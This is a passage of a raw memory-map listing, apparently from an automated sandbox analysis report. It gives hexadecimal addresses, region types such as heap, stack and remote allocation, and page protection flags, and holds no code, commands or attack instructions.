|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
291AF000
|
stack
|
page read and write
|
||
29690000
|
trusted library allocation
|
page read and write
|
||
3BE2F000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
2B07C3C0000
|
heap
|
page read and write
|
||
41C20000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
46B0000
|
trusted library allocation
|
page read and write
|
||
1A2C41A3000
|
heap
|
page read and write
|
||
1A2C4331000
|
heap
|
page read and write
|
||
13C03000
|
direct allocation
|
page read and write
|
||
40BD0000
|
trusted library allocation
|
page read and write
|
||
21DD000
|
direct allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
1A2C435E000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
3BE2B000
|
heap
|
page read and write
|
||
25D6F000
|
stack
|
page read and write
|
||
416000
|
unkown
|
page readonly
|
||
3D930000
|
heap
|
page read and write
|
||
7FFAAB970000
|
trusted library allocation
|
page execute and read and write
|
||
29CB0000
|
remote allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
3DD08000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
21C38E54000
|
heap
|
page read and write
|
||
1A2C4364000
|
heap
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
2B07C260000
|
heap
|
page execute and read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7FB5F000
|
direct allocation
|
page read and write
|
||
28D50000
|
trusted library allocation
|
page read and write
|
||
21C33800000
|
heap
|
page read and write
|
||
3D91E000
|
stack
|
page read and write
|
||
29E32794000
|
heap
|
page read and write
|
||
28E20000
|
trusted library allocation
|
page read and write
|
||
21C38CC0000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
297F0000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
D936C7E000
|
stack
|
page read and write
|
||
40AA0000
|
trusted library allocation
|
page read and write
|
||
1A2C4303000
|
heap
|
page read and write
|
||
40C20000
|
trusted library allocation
|
page read and write
|
||
1A2C4194000
|
heap
|
page read and write
|
||
2406B000
|
heap
|
page read and write
|
||
40AC0000
|
trusted library allocation
|
page read and write
|
||
7DE000
|
stack
|
page read and write
|
||
41445000
|
trusted library allocation
|
page read and write
|
||
1A2C430A000
|
heap
|
page read and write
|
||
1A2C4175000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
3FD38000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
3BE4B000
|
heap
|
page read and write
|
||
29E3275E000
|
heap
|
page read and write
|
||
41DB0000
|
trusted library allocation
|
page read and write
|
||
29E1C315000
|
trusted library allocation
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
2A001000
|
trusted library allocation
|
page read and write
|
||
1A2C436A000
|
heap
|
page read and write
|
||
7FFAABB40000
|
trusted library allocation
|
page read and write
|
||
1444E000
|
stack
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
41570000
|
trusted library allocation
|
page read and write
|
||
4097E000
|
trusted library allocation
|
page read and write
|
||
2B07A2C0000
|
heap
|
page readonly
|
||
1A2C41BA000
|
heap
|
page read and write
|
||
1A2C434B000
|
heap
|
page read and write
|
||
3BE40000
|
heap
|
page read and write
|
||
40F2F000
|
stack
|
page read and write
|
||
402D2000
|
trusted library allocation
|
page read and write
|
||
1A2C41BA000
|
heap
|
page read and write
|
||
4121A000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
21C33FC1000
|
trusted library allocation
|
page read and write
|
||
1A2C9979000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
29E18230000
|
heap
|
page read and write
|
||
7F1B0000
|
direct allocation
|
page read and write
|
||
344F000
|
stack
|
page read and write
|
||
3DDC0000
|
trusted library allocation
|
page read and write
|
||
7E0000
|
remote allocation
|
page execute and read and write
|
||
40BD0000
|
trusted library allocation
|
page read and write
|
||
28E40000
|
trusted library allocation
|
page read and write
|
||
41C30000
|
trusted library allocation
|
page read and write
|
||
2932E000
|
stack
|
page read and write
|
||
13EFE000
|
stack
|
page read and write
|
||
21C346C0000
|
trusted library section
|
page readonly
|
||
7FFAABC00000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
4098D000
|
trusted library allocation
|
page read and write
|
||
3BE50000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
3DDB3000
|
trusted library allocation
|
page read and write
|
||
56E000
|
unkown
|
page read and write
|
||
29690000
|
trusted library allocation
|
page read and write
|
||
7FB70000
|
direct allocation
|
page read and write
|
||
1A2C42A0000
|
remote allocation
|
page read and write
|
||
41A30000
|
remote allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
29E326E4000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
41480000
|
trusted library allocation
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
28EA0000
|
trusted library allocation
|
page read and write
|
||
3BE90000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
28CA0000
|
trusted library allocation
|
page read and write
|
||
44B000
|
unkown
|
page execute and read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
84D000
|
stack
|
page read and write
|
||
2967E000
|
stack
|
page read and write
|
||
41D80000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
40C30000
|
trusted library allocation
|
page read and write
|
||
40B50000
|
trusted library allocation
|
page read and write
|
||
7F0B0000
|
direct allocation
|
page read and write
|
||
71268FE000
|
stack
|
page read and write
|
||
3DDC6000
|
trusted library allocation
|
page read and write
|
||
41C40000
|
trusted library allocation
|
page read and write
|
||
AAE000
|
stack
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
29E19CA0000
|
trusted library allocation
|
page read and write
|
||
7EF10000
|
direct allocation
|
page read and write
|
||
28EB0000
|
trusted library allocation
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
21C38EEC000
|
heap
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
40B70000
|
trusted library allocation
|
page read and write
|
||
19AC15F0000
|
heap
|
page read and write
|
||
13C5C000
|
stack
|
page read and write
|
||
412FD000
|
stack
|
page read and write
|
||
1A2C9979000
|
trusted library allocation
|
page read and write
|
||
1A2C34C2000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
296F0000
|
trusted library allocation
|
page read and write
|
||
3BE33000
|
heap
|
page read and write
|
||
1A2C4710000
|
heap
|
page read and write
|
||
141BE000
|
stack
|
page read and write
|
||
29FF0000
|
trusted library allocation
|
page read and write
|
||
7FFAABAB0000
|
trusted library allocation
|
page read and write
|
||
7EA80000
|
direct allocation
|
page read and write
|
||
1A2C3638000
|
trusted library allocation
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
41C30000
|
trusted library allocation
|
page read and write
|
||
29E1C366000
|
trusted library allocation
|
page read and write
|
||
D9371BB000
|
stack
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
19AC1727000
|
heap
|
page read and write
|
||
426000
|
unkown
|
page execute and read and write
|
||
40A70000
|
trusted library allocation
|
page read and write
|
||
41E70000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
402C0000
|
trusted library allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
40BA0000
|
trusted library allocation
|
page read and write
|
||
3D934000
|
heap
|
page read and write
|
||
29E1B081000
|
trusted library allocation
|
page read and write
|
||
7FFAABB60000
|
trusted library allocation
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
4171E000
|
stack
|
page read and write
|
||
5B8000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
29700000
|
trusted library allocation
|
page read and write
|
||
80B000
|
heap
|
page read and write
|
||
426000
|
unkown
|
page execute and read and write
|
||
2B07C16C000
|
heap
|
page read and write
|
||
1A2C4330000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
1A2C41A0000
|
heap
|
page read and write
|
||
1A2C41AF000
|
heap
|
page read and write
|
||
C2F373E000
|
stack
|
page read and write
|
||
27040000
|
trusted library allocation
|
page read and write
|
||
7E0000
|
unkown
|
page execute and read and write
|
||
2A000000
|
trusted library allocation
|
page read and write
|
||
7FFAABBC0000
|
trusted library allocation
|
page read and write
|
||
3BE10000
|
heap
|
page read and write
|
||
21C38CC4000
|
trusted library allocation
|
page read and write
|
||
314B17E000
|
unkown
|
page readonly
|
||
1A2C4377000
|
heap
|
page read and write
|
||
41D90000
|
trusted library allocation
|
page read and write
|
||
29FF0000
|
trusted library allocation
|
page read and write
|
||
411C0000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
41442000
|
trusted library allocation
|
page read and write
|
||
7EB10000
|
direct allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
29E1828F000
|
heap
|
page read and write
|
||
2851E000
|
trusted library allocation
|
page read and write
|
||
40B10000
|
trusted library allocation
|
page read and write
|
||
6EC41000
|
unkown
|
page execute read
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
1A2C4349000
|
heap
|
page read and write
|
||
1A2C42F6000
|
heap
|
page read and write
|
||
1A2C4362000
|
heap
|
page read and write
|
||
740000
|
remote allocation
|
page execute and read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
1A2C46D5000
|
heap
|
page read and write
|
||
3DBF0000
|
heap
|
page read and write
|
||
28D10000
|
trusted library allocation
|
page read and write
|
||
24034000
|
heap
|
page read and write
|
||
40E2E000
|
stack
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
D936AFE000
|
stack
|
page read and write
|
||
1A2C438F000
|
heap
|
page read and write
|
||
3149EAC000
|
stack
|
page read and write
|
||
29FF0000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
40B50000
|
trusted library allocation
|
page read and write
|
||
3BE7E000
|
stack
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
141BE000
|
stack
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
40C40000
|
trusted library allocation
|
page read and write
|
||
27F78000
|
trusted library allocation
|
page read and write
|
||
41C27000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
29E1BA81000
|
trusted library allocation
|
page read and write
|
||
29E1BF5D000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
28DC0000
|
trusted library allocation
|
page read and write
|
||
23F8000
|
direct allocation
|
page read and write
|
||
29FF0000
|
trusted library allocation
|
page read and write
|
||
1A2C4366000
|
heap
|
page read and write
|
||
3D824000
|
heap
|
page read and write
|
||
21C33929000
|
heap
|
page read and write
|
||
41570000
|
trusted library allocation
|
page read and write
|
||
1A2C4717000
|
heap
|
page read and write
|
||
29E1C1A9000
|
trusted library allocation
|
page read and write
|
||
29E19C90000
|
heap
|
page readonly
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
2B07A125000
|
heap
|
page read and write
|
||
28EA0000
|
trusted library allocation
|
page read and write
|
||
41400000
|
trusted library allocation
|
page read and write
|
||
13C11000
|
direct allocation
|
page read and write
|
||
1A2C9941000
|
trusted library allocation
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
1A2C41AA000
|
heap
|
page read and write
|
||
712714E000
|
stack
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7F250000
|
direct allocation
|
page read and write
|
||
25B13000
|
trusted library allocation
|
page read and write
|
||
3DD99000
|
trusted library allocation
|
page read and write
|
||
3DB7E000
|
stack
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
29E1C059000
|
trusted library allocation
|
page read and write
|
||
2B07C398000
|
heap
|
page read and write
|
||
21C33840000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
21C39020000
|
remote allocation
|
page read and write
|
||
314A67E000
|
stack
|
page read and write
|
||
29E1C1CE000
|
trusted library allocation
|
page read and write
|
||
414D0000
|
trusted library allocation
|
page read and write
|
||
2B07A020000
|
heap
|
page read and write
|
||
29690000
|
trusted library allocation
|
page read and write
|
||
1A2C9979000
|
trusted library allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
21C347E0000
|
trusted library allocation
|
page read and write
|
||
3BE32000
|
heap
|
page read and write
|
||
1A2C436A000
|
heap
|
page read and write
|
||
1A2C4352000
|
heap
|
page read and write
|
||
1A2C42FB000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
2B07A010000
|
heap
|
page read and write
|
||
29E326B8000
|
heap
|
page read and write
|
||
28536000
|
trusted library allocation
|
page read and write
|
||
19AC1757000
|
heap
|
page read and write
|
||
41570000
|
trusted library allocation
|
page read and write
|
||
3D8B7000
|
trusted library allocation
|
page execute and read and write
|
||
29E182D2000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
25FC9000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
2135000
|
direct allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
1A2C4362000
|
heap
|
page read and write
|
||
7FFAABC30000
|
trusted library allocation
|
page read and write
|
||
24084000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C41AA000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
25B42000
|
trusted library allocation
|
page read and write
|
||
1A2C4366000
|
heap
|
page read and write
|
||
29E1C0B9000
|
trusted library allocation
|
page read and write
|
||
7FBF0000
|
direct allocation
|
page read and write
|
||
1A2C3630000
|
trusted library allocation
|
page read and write
|
||
41439000
|
trusted library allocation
|
page read and write
|
||
7FFAAB852000
|
trusted library allocation
|
page read and write
|
||
3DDB0000
|
trusted library allocation
|
page read and write
|
||
1A2C41A3000
|
heap
|
page read and write
|
||
29E19F80000
|
heap
|
page execute and read and write
|
||
41480000
|
trusted library allocation
|
page read and write
|
||
13BE6000
|
direct allocation
|
page read and write
|
||
13C0A000
|
direct allocation
|
page read and write
|
||
414D0000
|
trusted library allocation
|
page read and write
|
||
29690000
|
trusted library allocation
|
page read and write
|
||
41450000
|
trusted library allocation
|
page read and write
|
||
3BDF4000
|
heap
|
page read and write
|
||
1A2C437A000
|
heap
|
page read and write
|
||
3DE64000
|
trusted library allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
29750000
|
trusted library allocation
|
page read and write
|
||
28CB0000
|
trusted library allocation
|
page read and write
|
||
1A2C4362000
|
heap
|
page read and write
|
||
21C337E0000
|
trusted library section
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1403E000
|
stack
|
page read and write
|
||
314B4FE000
|
stack
|
page read and write
|
||
41A7E000
|
stack
|
page read and write
|
||
3BE95000
|
heap
|
page read and write
|
||
41C30000
|
trusted library allocation
|
page read and write
|
||
21C38C81000
|
trusted library allocation
|
page read and write
|
||
41384000
|
heap
|
page read and write
|
||
1A2C9979000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
294C3000
|
heap
|
page read and write
|
||
41447000
|
trusted library allocation
|
page read and write
|
||
21C38E61000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
3D8C0000
|
heap
|
page read and write
|
||
3BE60000
|
heap
|
page read and write
|
||
1A2C48CE000
|
trusted library allocation
|
page read and write
|
||
7FFAABB30000
|
trusted library allocation
|
page read and write
|
||
19AC18E4000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
19AC1757000
|
heap
|
page read and write
|
||
7F0C0000
|
direct allocation
|
page read and write
|
||
41253000
|
heap
|
page read and write
|
||
3D8B2000
|
trusted library allocation
|
page read and write
|
||
41570000
|
trusted library allocation
|
page read and write
|
||
1A2C4188000
|
heap
|
page read and write
|
||
1A2C35A8000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
29E1FEEE000
|
trusted library allocation
|
page read and write
|
||
414B0000
|
trusted library allocation
|
page read and write
|
||
29E19C50000
|
heap
|
page read and write
|
||
40AE0000
|
trusted library allocation
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
29FF0000
|
trusted library allocation
|
page read and write
|
||
C2F327D000
|
stack
|
page read and write
|
||
198000
|
stack
|
page read and write
|
||
2B07C370000
|
heap
|
page read and write
|
||
29E323AB000
|
heap
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
7FFAAB834000
|
trusted library allocation
|
page read and write
|
||
19AC1664000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C9452000
|
trusted library allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
40A51000
|
heap
|
page read and write
|
||
402DE000
|
trusted library allocation
|
page read and write
|
||
3D8AA000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAABB50000
|
trusted library allocation
|
page read and write
|
||
4034F000
|
stack
|
page read and write
|
||
1A2C4198000
|
heap
|
page read and write
|
||
3FECE000
|
stack
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
308C000
|
heap
|
page read and write
|
||
40BB0000
|
trusted library allocation
|
page read and write
|
||
13C56000
|
direct allocation
|
page read and write
|
||
29E1C08C000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
7FFAABB40000
|
trusted library allocation
|
page read and write
|
||
24005000
|
heap
|
page read and write
|
||
1A2C4717000
|
heap
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
29E1A040000
|
heap
|
page execute and read and write
|
||
3BE2E000
|
heap
|
page read and write
|
||
29CB0000
|
remote allocation
|
page read and write
|
||
40B60000
|
trusted library allocation
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2611000
|
direct allocation
|
page read and write
|
||
40C30000
|
trusted library allocation
|
page read and write
|
||
1A2C48E5000
|
trusted library allocation
|
page read and write
|
||
C2F32FE000
|
stack
|
page read and write
|
||
7DF492A60000
|
trusted library allocation
|
page execute and read and write
|
||
44B000
|
unkown
|
page execute and read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
1454F000
|
stack
|
page read and write
|
||
2B07C378000
|
heap
|
page read and write
|
||
28CC0000
|
trusted library allocation
|
page read and write
|
||
7FFAAB8EC000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
41D90000
|
trusted library allocation
|
page read and write
|
||
25C40000
|
heap
|
page read and write
|
||
1A2C439E000
|
heap
|
page read and write
|
||
40BC0000
|
trusted library allocation
|
page read and write
|
||
21C3388C000
|
heap
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
21C34002000
|
heap
|
page read and write
|
||
25B36000
|
trusted library allocation
|
page execute and read and write
|
||
28E90000
|
trusted library allocation
|
page read and write
|
||
29478000
|
heap
|
page read and write
|
||
3DE4B000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
800000
|
unkown
|
page execute and read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C41BA000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
1A2C438D000
|
heap
|
page read and write
|
||
19AC1688000
|
heap
|
page read and write
|
||
6EC40000
|
unkown
|
page readonly
|
||
1A2C41A4000
|
heap
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
414A0000
|
trusted library allocation
|
page read and write
|
||
3450000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
314B8FE000
|
stack
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
40F2F000
|
stack
|
page read and write
|
||
2B000001000
|
trusted library allocation
|
page read and write
|
||
7FFAABBC0000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
3D960000
|
heap
|
page read and write
|
||
7F11F000
|
direct allocation
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page read and write
|
||
2B010011000
|
trusted library allocation
|
page read and write
|
||
29E1A4D9000
|
trusted library allocation
|
page read and write
|
||
23FF000
|
direct allocation
|
page read and write
|
||
8A0000
|
unkown
|
page execute and read and write
|
||
21C38DD0000
|
trusted library allocation
|
page read and write
|
||
7FFAABAF0000
|
trusted library allocation
|
page read and write
|
||
41D90000
|
trusted library allocation
|
page read and write
|
||
3D900000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAB833000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C437E000
|
heap
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page execute and read and write
|
||
21C38CD9000
|
trusted library allocation
|
page read and write
|
||
41D80000
|
trusted library allocation
|
page read and write
|
||
40960000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C418F000
|
heap
|
page read and write
|
||
2453000
|
direct allocation
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
40A70000
|
trusted library allocation
|
page read and write
|
||
29690000
|
trusted library allocation
|
page read and write
|
||
29E323A4000
|
heap
|
page read and write
|
||
29E2AD4F000
|
trusted library allocation
|
page read and write
|
||
7FFAABB80000
|
trusted library allocation
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
19AC16A6000
|
heap
|
page read and write
|
||
3DC00000
|
trusted library allocation
|
page read and write
|
||
7FB10000
|
direct allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
9A000
|
stack
|
page read and write
|
||
29E1BF0F000
|
trusted library allocation
|
page read and write
|
||
13BC3000
|
direct allocation
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
4143B000
|
trusted library allocation
|
page read and write
|
||
718000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C438D000
|
heap
|
page read and write
|
||
7EE50000
|
direct allocation
|
page read and write
|
||
28531000
|
trusted library allocation
|
page read and write
|
||
3BD7A000
|
heap
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
4143B000
|
trusted library allocation
|
page read and write
|
||
1A2C34BE000
|
heap
|
page read and write
|
||
418AE000
|
stack
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
13EDF000
|
stack
|
page read and write
|
||
41D70000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
1A2C48F5000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C4377000
|
heap
|
page read and write
|
||
1A2C438D000
|
heap
|
page read and write
|
||
25C30000
|
trusted library allocation
|
page read and write
|
||
14976000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
23FFB000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
1A2C9979000
|
trusted library allocation
|
page read and write
|
||
294DE000
|
heap
|
page read and write
|
||
21C338FF000
|
heap
|
page read and write
|
||
41478000
|
trusted library allocation
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
1A2C34A0000
|
heap
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
21C38DC0000
|
trusted library allocation
|
page read and write
|
||
7FB70000
|
direct allocation
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
28550000
|
trusted library allocation
|
page read and write
|
||
7FBF0000
|
direct allocation
|
page read and write
|
||
1454D000
|
stack
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
28510000
|
trusted library allocation
|
page read and write
|
||
29C2F000
|
stack
|
page read and write
|
||
314B3FE000
|
stack
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
3D8A0000
|
trusted library allocation
|
page read and write
|
||
3D8B0000
|
trusted library allocation
|
page read and write
|
||
1A2C4191000
|
heap
|
page read and write
|
||
C2F36BE000
|
stack
|
page read and write
|
||
28E50000
|
trusted library allocation
|
page read and write
|
||
41D90000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
14FEE000
|
heap
|
page read and write
|
||
3BE80000
|
trusted library section
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
1A2C9B20000
|
heap
|
page read and write
|
||
7FFAABA10000
|
trusted library allocation
|
page execute and read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
2BF0000
|
heap
|
page read and write
|
||
41388000
|
heap
|
page read and write
|
||
1A2C432C000
|
heap
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
29E1A205000
|
trusted library allocation
|
page read and write
|
||
5FA000
|
heap
|
page read and write
|
||
1A2C41A3000
|
heap
|
page read and write
|
||
7FFAAB9EA000
|
trusted library allocation
|
page read and write
|
||
41400000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
23F3000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
3D870000
|
trusted library allocation
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7F0C0000
|
direct allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
21C38E8C000
|
heap
|
page read and write
|
||
25B70000
|
heap
|
page execute and read and write
|
||
81B000
|
heap
|
page read and write
|
||
21C33813000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
2EFD000
|
stack
|
page read and write
|
||
1A2C9920000
|
trusted library allocation
|
page read and write
|
||
41C30000
|
trusted library allocation
|
page read and write
|
||
3DA6F000
|
stack
|
page read and write
|
||
21C38C60000
|
trusted library allocation
|
page read and write
|
||
2A010000
|
trusted library allocation
|
page read and write
|
||
56E000
|
unkown
|
page read and write
|
||
737000
|
heap
|
page read and write
|
||
21FA000
|
direct allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
2942B000
|
stack
|
page read and write
|
||
414B0000
|
trusted library allocation
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
41300000
|
heap
|
page read and write
|
||
41431000
|
trusted library allocation
|
page read and write
|
||
1A2C3638000
|
trusted library allocation
|
page read and write
|
||
7FFAABBD0000
|
trusted library allocation
|
page read and write
|
||
29440000
|
trusted library allocation
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
2B07A3EC000
|
heap
|
page read and write
|
||
2A030000
|
trusted library allocation
|
page read and write
|
||
2B90000
|
heap
|
page read and write
|
||
40A16000
|
trusted library allocation
|
page read and write
|
||
2340000
|
heap
|
page read and write
|
||
24019000
|
heap
|
page read and write
|
||
21C346F0000
|
trusted library section
|
page readonly
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
29E2A060000
|
trusted library allocation
|
page read and write
|
||
97000
|
stack
|
page read and write
|
||
41D90000
|
trusted library allocation
|
page read and write
|
||
1440E000
|
stack
|
page read and write
|
||
2B0017D5000
|
trusted library allocation
|
page read and write
|
||
29EA7000
|
trusted library allocation
|
page read and write
|
||
29430000
|
